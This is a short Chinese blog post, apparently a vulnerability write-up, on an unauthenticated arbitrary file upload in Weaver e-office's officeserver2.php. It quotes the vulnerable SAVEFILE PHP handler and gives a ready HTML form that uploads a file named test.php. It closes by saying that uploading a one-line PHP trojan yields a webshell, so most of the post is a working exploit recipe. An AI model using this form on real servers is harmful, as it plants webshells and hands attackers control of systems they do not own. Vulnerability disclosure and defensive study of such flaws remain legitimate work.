美文网首页
泛微Eoffice任意文件上传可直接getshell

泛微Eoffice任意文件上传可直接getshell

作者: 这是什么娃哈哈 | 来源:发表于2019-01-17 10:17 被阅读0次

参考链接:https://bugs.shuimugan.com/bug/view?bug_no=125638

1.某文件多处任意文件上传,可直接getshell ,相关代码如下

 case "SAVEFILE" :
                $mRecordID = $RECORDID;
                $mUserName = $USERNAME;
                $mFileName = $FILENAME;
                $mFileType = $FILETYPE;
                $mDescript = $DESCRIPT;
                $mFileDate = $FileDate;
                $mFullPath = $mFilePath."/".$mFileName;
                if ( is_uploaded_file( $_FILES['MsgFileBody']['tmp_name'] ) )
                {
                                if ( move_uploaded_file( $_FILES['MsgFileBody']['tmp_name'], $mFullPath ) )
                                {
                                                $mFileSize = $_FILES['MsgFileBody']['size'];
                                                $result = true;
                                }
                                else
                                {
                                                $MsgObj->MsgError( "Save File Error" );
                                                $result = false;
                                }
                }

2.我们要构造一份表单
OPTION为SAVEFILE,FILENAME是保存的文件名可以自己命名

<select>
  <option value ="volvo">SAVEFILE</option>
</select>
<form method='post' action='/iweboffice/officeserver2.php?OPTION=SAVEFILE&FILENAME=test.php'  enctype="multipart/form-data" > 
<input type="file" name="MsgFileBody" style="height:20px;BORDER: #8F908B 1px solid;"/></br></br>
<button type=submit value="上传">上传</button> </form>

上传一句话木马即可获取webshell

相关文章

  • 泛微Eoffice任意文件上传可直接getshell

    参考链接:https://bugs.shuimugan.com/bug/view?bug_no=125638 1....

  • 网鼎杯java_file writeup

    原题是一道Java文件上传的题目,首先通过上传文件,无法进行正常getshell,在下载处我们通过FUZZ得出任意...

  • CTF练习平台(七)

    求getshell 打开题目链接,让上传一个图片而不是PHP文件,但是根据惯例,只有成功上传一个php文件才能拿到...

  • webshell实验

    1完成任意文件下载实验并载图 在后面接../../../../文件便能下载任意你想需要文件 2完成任意文件上传客户...

  • flask debug配合文件上传getshell

    前言 在8月25日的安恒杯月赛题出现了一道flask debug配合任意文件读取的题,当时没有搞出来,作为萌新没见...

  • 文件上传漏洞

    为什么文件上传存在漏洞 上传文件的时候,如果服务器脚本语言,未对上传的文件进行严格的验证和过滤,就容易造成上传任意...

  • 致远A8 OA系统任意文件上传getshell漏洞分析报告

    漏洞影响范围 致远OA A8-V5 V6.1 SP1致远OA A8+协同管理软件 V7.0致远OA A8+协同管理...

  • [upload_labs]文件上传绕过小结

    前言: 在日常渗透中,上传文件是getshell的一个常用方案,在其中,我们常常直接修改后缀进行绕过,如果不行,往...

  • vue-simple-uploader组件的使用感受

    题记:(可直接跳过)我刚实习的时候,就接手了一个任务:重写项目中前端文件上传功能,因为需要支持文件夹上传这个功能点...

  • 美团面经总结

    1.文件上传样式处理 使用label标签点击,触发file类型的input,input可直接display: no...

网友评论

      本文标题:泛微Eoffice任意文件上传可直接getshell

      本文链接:https://www.haomeiwen.com/subject/kfbxdqtx.html